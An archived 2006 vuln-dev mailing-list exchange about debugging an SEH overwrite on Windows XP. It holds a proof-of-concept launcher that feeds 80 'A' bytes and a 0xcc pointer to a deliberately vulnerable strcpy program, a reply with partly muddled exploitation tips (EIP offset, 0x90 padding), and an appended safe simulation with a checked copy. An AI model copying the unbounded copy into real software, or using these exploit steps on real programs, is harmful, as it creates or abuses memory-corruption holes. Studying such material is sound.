Vulnerability Development: Re: debugging seh overwrite

Re: debugging seh overwrite

From: Karma <karma_at_frij.com.au>
Date: Tue, 21 Mar 2006 19:22:18 +1100

Hey, my English isn't great either...

I am not an OllyDbg user, but STEP OVER until your CALL STRCPY is reached,
then STEP INTO the strcpy function one level. Then keep STEP OVER until
you see the RETN call from that function. You should see how your buffer
overwrite, in this case 41414141h, overwrites EIP and possibly ESP too. If you
actually want to see the pointer being overwritten, you need to step into the
function which possibly has a rep mov in strcpy, I don't know where. But you
can see it if you monitor the destination of the rep mov.

Also in your case, I haven't tried, but you simply set EIP to 41414141h which

a. is not the stack address, likely causes a segfault
b. is an invalid opcode, no valid slide

Find the offset of EIP using the crash, and use 90h as padding to try :)

Your code - memset(payload, 0x41, 80); // try 0x90
Your code - memcpy(payload+80, &ret, sizeof (int)); // yeah, you need &ret,
and you need to check the offset at EIP

Sorry if I misunderstood your question....

Karma

www.designfolks.com.au

----- Original Message -----
From: <laphoo_at_gmail.com>
To: <vuln-dev_at_securityfocus.com>
Sent: Monday, March 20, 2006 1:19 PM
Subject: debugging seh overwrite

Hello, I would like to know a way of debugging a vulnerable program where I
am overwriting the SE handler with my address. I have OllyDbg as just-in-time
debugger. If my exploit buffer reaches the pointer to the next SEH
record, nothing happens. Now I was trying to put breakpoint instructions
(0xcc) as a fake pointer, but OllyDbg ignored them, or I did something wrong.
How is it possible to debug my vulnerable program with OllyDbg, to see where
and with which data I overwrote something?

/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
#include <process.h>   /* execve() in the Visual C++ runtime */
int main (void)
{
    char *app[3];
    char payload[85];               /* 80 bytes of filler + 4-byte pointer + NUL */
    unsigned int ret = 0xcccccccc;  /* fake pointer made of int3 (0xcc) bytes */
    memset(payload, 0x00, sizeof payload);
    memset(payload, 0x41, 80);      /* 'A' filler up to the overwritten pointer */
    memcpy(payload+80, &ret, sizeof ret);
    app[0] = "vuln.exe";
    app[1] = payload;
    app[2] = NULL;
    execve(app[0], app, NULL);
    return 0;
}

/* vuln.c */
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
    char string[32];
    if (argc != 2)
    {
        printf("Usage: %s <string>\n", argv[0]);
        return 0;
    }
    strcpy(string, argv[1]);   /* unbounded copy into a 32-byte buffer: the overflow under discussion */
    printf("%s", string);
    return 0;
}

Environment is Windows XP SP2

I am sorry for my bad English.

Regards,
-- Laphoo
Received on Mar 22 2006
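The mechanism Karma describes (the strcpy destination running on past the 32-byte buffer into whatever sits above it), as an added example that is neither poster's code: a self-contained C program that rebuilds expl.c's argument and copies it first the way vuln.c's strcpy does and then with a length check. The 96-byte frame, the slot at offset 80 and the SENTINEL value are constructed stand-ins inside one array, not a real stack frame, so the program is safe to run anywhere.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STRING_SIZE 32            /* char string[32] in vuln.c */
#define SLOT_OFFSET 80            /* payload+80 in expl.c */
#define FRAME_SIZE  96            /* constructed stand-in for the stack region, not a real frame */
#define SENTINEL    0x11223344u   /* constructed: what the "saved pointer" slot holds before the copy */

/* Does the argument fit in vuln.c's 32-byte buffer, NUL included? */
int input_fits(const char *arg)
{
    return strlen(arg) < STRING_SIZE;
}

/* Copy arg into a frame whose slot at SLOT_OFFSET holds SENTINEL and return
 * the slot's value afterwards. checked == 0 copies like vuln.c's strcpy, with
 * no regard for STRING_SIZE; checked != 0 is the hardened form, which refuses
 * anything that does not fit and leaves the frame untouched. arg must be
 * shorter than FRAME_SIZE so the simulation itself stays in bounds. */
uint32_t slot_after_copy(const char *arg, int checked)
{
    unsigned char frame[FRAME_SIZE];
    uint32_t v = SENTINEL;
    memset(frame, 0, sizeof frame);
    memcpy(frame + SLOT_OFFSET, &v, sizeof v);
    if (!checked || input_fits(arg))
        memcpy(frame, arg, strlen(arg) + 1);   /* unchecked path overruns STRING_SIZE */
    memcpy(&v, frame + SLOT_OFFSET, sizeof v);
    return v;
}

/* Build the argument expl.c builds (80 'A's, a 4-byte value, a NUL) and run
 * it through either copy. */
uint32_t slot_after_payload(uint32_t tail, int checked)
{
    char payload[SLOT_OFFSET + sizeof tail + 1];
    memset(payload, 0, sizeof payload);
    memset(payload, 'A', SLOT_OFFSET);
    memcpy(payload + SLOT_OFFSET, &tail, sizeof tail);
    return slot_after_copy(payload, checked);
}

int main(void)
{
    printf("strcpy-style copy: slot = 0x%08x\n", (unsigned)slot_after_payload(0xccccccccu, 0));
    printf("checked copy:      slot = 0x%08x\n", (unsigned)slot_after_payload(0xccccccccu, 1));
    return 0;
}
```

The first line shows the 0xcc bytes from the argument landing in the slot 80 bytes above the buffer, which is exactly what the thread is trying to observe in the debugger; the second shows the length check keeping the sentinel intact.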
